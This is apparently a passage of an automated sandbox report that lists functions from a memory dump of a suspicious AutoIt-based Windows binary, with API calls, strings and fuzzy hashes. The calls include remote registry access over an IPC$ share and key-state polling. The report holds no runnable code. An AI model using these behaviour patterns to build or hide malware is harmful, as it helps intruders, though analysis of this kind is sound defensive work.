LoadImageW.USER32 ref: 008A1529
SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 008A1542
ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 008A1563
DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 008A1587
SendMessageW.USER32(?,000000F7,00000001,?), ref: 008A1596
DeleteObject.GDI32(?), ref: 008A15A4
DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 008A15B2

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
String ID:
API String ID: 3218148540-0
Opcode ID: d9591d844e1c40221385e4cd57fcded31958da3beaf75a6b47d94d308c94ffa6
Instruction ID: 799bc69e571183446a9cde9936fc278bf92b27de605593caee12fa7a6df953ea
Opcode Fuzzy Hash: d9591d844e1c40221385e4cd57fcded31958da3beaf75a6b47d94d308c94ffa6
Instruction Fuzzy Hash: 94418075744309ABEB209F68DC4DBAB77A8FB85721F104619FA42E76C0CB74E845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 008885C8, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00832390: _wcslen.LIBCMT ref: 0083239D
Part of subcall function 00832390: _memmove.LIBCMT ref: 008323C3

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00888698
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008886B5
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 008886D3
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00888701
CLSIDFromString.OLE32(?,?), ref: 0088872A
RegCloseKey.ADVAPI32(000001FE), ref: 00888736
RegCloseKey.ADVAPI32(?), ref: 0088873C

Strings

SOFTWARE\Classes\, xrefs: 008885F7
\IPC$, xrefs: 0088867B
\CLSID, xrefs: 0088860F

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 600699880-22481851
Opcode ID: 6ba5bc10118a076a8105def03e9064e8bb1e92668a8c619adca5e7f2dc50e4ec
Instruction ID: 5ce7ad68898f64677257a489d8e20be5b59f9fbf9a3022c83b9804afaf20d940
Opcode Fuzzy Hash: 6ba5bc10118a076a8105def03e9064e8bb1e92668a8c619adca5e7f2dc50e4ec
Instruction Fuzzy Hash: D7414376D0020DABCB14EFA8DC45ADE77B9FF84340F508115F915E7251EB74A909CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0089B028, Relevance: 16.9, APIs: 11, Instructions: 400registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0089B103

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ConnectRegistry_memmove_wcslen
String ID:
API String ID: 15295421-0
Opcode ID: 837d697e22027afcb047273379dbec0bca106dbe992070559f143de20388cdf5
Instruction ID: 8cecb83d4d479f697e4bc3469636f9deec78f673113fbfaba7d303aedf7bc4bc
Opcode Fuzzy Hash: 837d697e22027afcb047273379dbec0bca106dbe992070559f143de20388cdf5
Instruction Fuzzy Hash: D7E14C71614201ABDB14EF68DD82F2AB7E9FF88704F148A1CF585D7281DB35E901CB96

Uniqueness

Uniqueness Score: -1.00%

Function 008A931C, Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,008A95B7), ref: 008A933A
SafeArrayAllocData.OLEAUT32(008A95B7), ref: 008A9389
VariantInit.OLEAUT32(?), ref: 008A939B
SafeArrayAccessData.OLEAUT32(008A95B7,?), ref: 008A93BC
VariantCopy.OLEAUT32(?,?), ref: 008A941B
SafeArrayUnaccessData.OLEAUT32(008A95B7), ref: 008A942E
VariantClear.OLEAUT32(?), ref: 008A9443
SafeArrayDestroyData.OLEAUT32(008A95B7), ref: 008A9468
SafeArrayDestroyDescriptor.OLEAUT32(008A95B7), ref: 008A9472
VariantClear.OLEAUT32(?), ref: 008A9484
SafeArrayDestroyDescriptor.OLEAUT32(008A95B7), ref: 008A94A1

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 1b2fbfa3febd0a36402db8aaa869572a150c93766b3dffb44dc60aa47d92c3d5
Instruction ID: 522b98de9da36493b0a5b75aa92901438f191705506e3e2c69983778fab86baf
Opcode Fuzzy Hash: 1b2fbfa3febd0a36402db8aaa869572a150c93766b3dffb44dc60aa47d92c3d5
Instruction Fuzzy Hash: 4A516176A00219EFCB00DFE8DD849DEB779FF88304F104569E945E7611DB349A46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00863044, Relevance: 16.6, APIs: 11, Instructions: 122COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00863058
__swprintf.LIBCMT ref: 0086306A
__wcsicoll.LIBCMT ref: 00863077
FindResourceW.KERNEL32(?,?,0000000E), ref: 0086308A
LoadResource.KERNEL32(?,00000000), ref: 008630A2
LockResource.KERNEL32(00000000), ref: 008630AF
FindResourceW.KERNEL32(?,?,00000003), ref: 008630DC
LoadResource.KERNEL32(?,00000000), ref: 008630EA
SizeofResource.KERNEL32(?,00000000), ref: 008630F9
LockResource.KERNEL32(?), ref: 00863105

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
String ID:
API String ID: 1158019794-0
Opcode ID: 21be38cdbb12f586579a8d0772065bd9d7a21b929207c8219213aa550d2221fd
Instruction ID: 4e40f5c00aee842484634fa2e6bda336eba95c2cb8a8a597962cc739c6d2c5ab
Opcode Fuzzy Hash: 21be38cdbb12f586579a8d0772065bd9d7a21b929207c8219213aa550d2221fd
Instruction Fuzzy Hash: E04100726042186BCB20DF64EC84FABB7ADFB89320F008116F911D7250EB75DA51CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00884262, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000001,?), ref: 0088433B
GetProcAddress.KERNEL32(?,AU3_FreeVar), ref: 00884354
_malloc.LIBCMT ref: 00884392
_strlen.LIBCMT ref: 008843F0
_malloc.LIBCMT ref: 008843FA
_strcat.LIBCMT ref: 0088440B
_free.LIBCMT ref: 00884550
_free.LIBCMT ref: 00884562

Strings

AU3_FreeVar, xrefs: 0088434E

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc_free_malloc$_strcat_strlen
String ID: AU3_FreeVar
API String ID: 2634073740-771828931
Opcode ID: 92fea593e922dce12b8c08ab812c93748fee841417ebdac645233bd18d4b523d
Instruction ID: 79f36d769c93ac9678a75c60b9a5c36b09235a3e21b0e4d2b6cb6353f8fedd53
Opcode Fuzzy Hash: 92fea593e922dce12b8c08ab812c93748fee841417ebdac645233bd18d4b523d
Instruction Fuzzy Hash: 8FB1B0B5A0020ADFCB10EF58C885A6AB7B5FF88314F2481A9E915CB362D735ED51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 008A10AB, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00886308: GetCursorPos.USER32(?), ref: 0088631D
Part of subcall function 00886308: ScreenToClient.USER32 ref: 0088633A
Part of subcall function 00886308: GetAsyncKeyState.USER32(?), ref: 00886377
Part of subcall function 00886308: GetAsyncKeyState.USER32(?), ref: 00886387

DefDlgProcW.USER32(?,00000205,?,?), ref: 008A10FF
ImageList_DragLeave.COMCTL32(00000000), ref: 008A111D
ImageList_EndDrag.COMCTL32 ref: 008A1123
ReleaseCapture.USER32 ref: 008A1129
SetWindowTextW.USER32(?,00000000), ref: 008A11C0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 008A11D0

Strings

@GUI_DRAGFILE, xrefs: 008A1234
@GUI_DROPID, xrefs: 008A11FF

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 2483343779-2107944366
Opcode ID: 5932f97b2448b4d98e44f380d6c7ea802bfb94125f953c1af42ada381ed7a43b
Instruction ID: 46d120462942cae6ad6c36502e8ead6444e19ddc649eaae9425f0ab33fdabf38
Opcode Fuzzy Hash: 5932f97b2448b4d98e44f380d6c7ea802bfb94125f953c1af42ada381ed7a43b
Instruction Fuzzy Hash: FA51CF316043119BDB14EF18DC89BAB77A5FB89360F004719F951DB2A2DB30DD05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0087807C, Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00878101
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00878104
GetWindowLongW.USER32 ref: 00878128
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0087814B
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008781BF
SendMessageW.USER32(?,00001074,?,00000007), ref: 0087820D
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00878228
SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 0087824A
SendMessageW.USER32(?,0000101E,00000001,?), ref: 00878261
SendMessageW.USER32(?,00001008,?,00000007), ref: 00878279

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: f04ff92aa252e89747da10b3e7460032d4338c684aaa62551c7824697bb8d791
Instruction ID: 08af396467f377a7541a1d0c4b150cbb0ea8eb0abe6b70afb6c60ad4ebda357d
Opcode Fuzzy Hash: f04ff92aa252e89747da10b3e7460032d4338c684aaa62551c7824697bb8d791
Instruction Fuzzy Hash: 01615D74A40608AFDB10DF98DC89FEA77B5FF49310F108259F614AB291DBB0AA45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 008984CB, Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON

Download Yara Rule

Strings

INSTANCE, xrefs: 0089876B
CLASSNN, xrefs: 008985AA
TEXT, xrefs: 0089879E
REGEXPCLASS, xrefs: 008985D7
NAME, xrefs: 00898663
CLASS, xrefs: 0089857D

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 0-1603158881
Opcode ID: b8ebe7d78fda12877ab61f46bdd988f6bbaa75e1bfce87182f2d80207d711df6
Instruction ID: 4516be895ae961c87d0bf72d8a966ed20c91e20c98b248433b941c6d6a2093a0
Opcode Fuzzy Hash: b8ebe7d78fda12877ab61f46bdd988f6bbaa75e1bfce87182f2d80207d711df6
Instruction Fuzzy Hash: 1AA17E72800205DACF00EF98D882BEA7764FB55304F58C479ED19EB256EF75A509CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00878524, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 0087855C
SetMenu.USER32(?,00000000), ref: 0087856C
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008785F0
IsMenu.USER32(?), ref: 00878604
CreatePopupMenu.USER32 ref: 0087860E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00878645
DrawMenuBar.USER32 ref: 0087864E

Strings

0, xrefs: 0087853E

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0
API String ID: 161812096-4108050209
Opcode ID: 1e106b5b1b502696c3cca8d55425a8117f10630622ddf59eaf5cc54133eaa6c8
Instruction ID: 63824de9eb0d528b3430f248ba3b58257bd2fee0da460a221cd461489628bdf3
Opcode Fuzzy Hash: 1e106b5b1b502696c3cca8d55425a8117f10630622ddf59eaf5cc54133eaa6c8
Instruction Fuzzy Hash: 2E415975A01209EFDB14DF68E888E9AB7B4FF49310F14825AE919DB345DB30E851CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0086401B, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,008D90E8,?,00000100,?,C:\Users\user\33920049\fmkkelc.omp), ref: 0086403E
LoadStringW.USER32(00000000), ref: 00864047
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0086405C
LoadStringW.USER32(00000000), ref: 0086405F
_wprintf.LIBCMT ref: 00864088
MessageBoxW.USER32(00000000,?,?,00011010), ref: 008640A0

Strings

C:\Users\user\33920049\fmkkelc.omp, xrefs: 00864027
%s (%d) : ==> %s: %s %s, xrefs: 00864083

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\33920049\fmkkelc.omp
API String ID: 3648134473-2895171533
Opcode ID: d369f9f7ad3fdc91aca71eacff0a6525dd57c26e77bfbf5e133a8f104f880dc8
Instruction ID: 5af46e3e05c9ef0fdf0d14d030a23f90e46da74b737aa3ddbb75b59677c1a4aa
Opcode Fuzzy Hash: d369f9f7ad3fdc91aca71eacff0a6525dd57c26e77bfbf5e133a8f104f880dc8
Instruction Fuzzy Hash: EE016CB165031C7AEB20E7549C07FF6372CF784711F004185B758EA1C199F46D448BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00886151, Relevance: 13.7, APIs: 9, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a82f36e35582f2448ac7894f835cfe23ce03bd122f1f7aaf38cab93aacba8169
Instruction ID: be961217984823776ecf292e671eb29f337a035c60ff93f3625efffe7317c464
Opcode Fuzzy Hash: a82f36e35582f2448ac7894f835cfe23ce03bd122f1f7aaf38cab93aacba8169
Instruction Fuzzy Hash: 7D517F70600309ABDB20EF69DC85F9B77A8FF58724F104619FA15DB2D1EB71E8648B50

Uniqueness

Uniqueness Score: -1.00%

Function 008710EC, Relevance: 13.6, APIs: 9, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a20cfc7f265253a392d5957d234cf67c8fc640d0aac6328d440df1e12adda33c
Instruction ID: 880ab90ad2f675d40aa289d9f97ce0b8ca29d38a409317647b3429e772d41c01
Opcode Fuzzy Hash: a20cfc7f265253a392d5957d234cf67c8fc640d0aac6328d440df1e12adda33c
Instruction Fuzzy Hash: DE410B322242405AE771A72CBCCCBAAB798F7B6335F54411BF189C9991C7A6F485C731

Uniqueness

Uniqueness Score: -1.00%

Function 0087F029, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0087F249
_memmove.LIBCMT ref: 0087F2B8
_memmove.LIBCMT ref: 0087F32C

Strings

h, xrefs: 0087F704
\, xrefs: 0087CFD7
', xrefs: 0087F198

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$_memcmp
String ID: '$\$h
API String ID: 2205784470-1303700344
Opcode ID: abcb502fed9e2b26b76d0fcf5ed0d21d73d738c3186d17adad89b9f134d2acfd
Instruction ID: 2ac33ffb1675a920b439de0f9b5de6e7f8f445153e2d44669ae2693a3442f827
Opcode Fuzzy Hash: abcb502fed9e2b26b76d0fcf5ed0d21d73d738c3186d17adad89b9f134d2acfd
Instruction Fuzzy Hash: 90E19E71A002498FCB18CF69C890AAEBBF2FF89304F24C56ED959D774AD770A941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00839400, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(008D7F04), ref: 0085C5DF
InterlockedDecrement.KERNEL32(008D7F04), ref: 0085C5FD
Sleep.KERNEL32(0000000A), ref: 0085C605
InterlockedIncrement.KERNEL32(008D7F04), ref: 0085C610
InterlockedDecrement.KERNEL32(008D7F04), ref: 0085C6C2

Strings

@COM_EVENTOBJ, xrefs: 0085C6F7, 0085C98E

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$DecrementIncrement$Sleep
String ID: @COM_EVENTOBJ
API String ID: 327565842-2228938565
Opcode ID: 9d820d7f8f52b7d8e405cfad9e1d9af40eb45b37d090964f67159147399c9f2f
Instruction ID: aeaede7e679c2c96011343bad849a48f427df8684d570a53af7b3e11fac20f1b
Opcode Fuzzy Hash: 9d820d7f8f52b7d8e405cfad9e1d9af40eb45b37d090964f67159147399c9f2f
Instruction Fuzzy Hash: 75D18D719002098FCB10EF98C885BEEB7B5FF84305F248559E905EB292DB74AD4ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 008A0216, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 008A02D5
VariantClear.OLEAUT32(?), ref: 008A0409
VariantInit.OLEAUT32(?), ref: 008A045D
DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 008A04BE
VariantClear.OLEAUT32(?), ref: 008A04D0

Part of subcall function 0086548F: VariantCopy.OLEAUT32(?,?), ref: 008654A0

VariantCopy.OLEAUT32(?,?), ref: 008A0534

Part of subcall function 00865411: VariantClear.OLEAUT32(?), ref: 00865422

VariantClear.OLEAUT32(00000000), ref: 008A05C7

Strings

H, xrefs: 008A02B0

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$Clear$Copy$CallDispFuncInit
String ID: H
API String ID: 3613100350-2852464175
Opcode ID: 1820b2290948dcee77b7e6e71e871c20eacbad201a214a0f4ba863d169f18a9d
Instruction ID: 7efcbad825ef00f83d468ddc87e5a6eab5f6d313c426056aa01381c419dc0338
Opcode Fuzzy Hash: 1820b2290948dcee77b7e6e71e871c20eacbad201a214a0f4ba863d169f18a9d
Instruction Fuzzy Hash: 23B17AB5A04311AFE710DF58C484A2AB3E4FF89308F148A2CF995DB741D635E851CF96

Uniqueness

Uniqueness Score: -1.00%

Function 008652D0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

SafeArrayAccessData.OLEAUT32(?,?), ref: 008652F4
VariantClear.OLEAUT32(?), ref: 0086532E
SafeArrayUnaccessData.OLEAUT32(?), ref: 0086534E
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00865381
VariantClear.OLEAUT32(?), ref: 008653C1
SafeArrayUnaccessData.OLEAUT32(?), ref: 00865404

Strings

crts, xrefs: 00865305

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
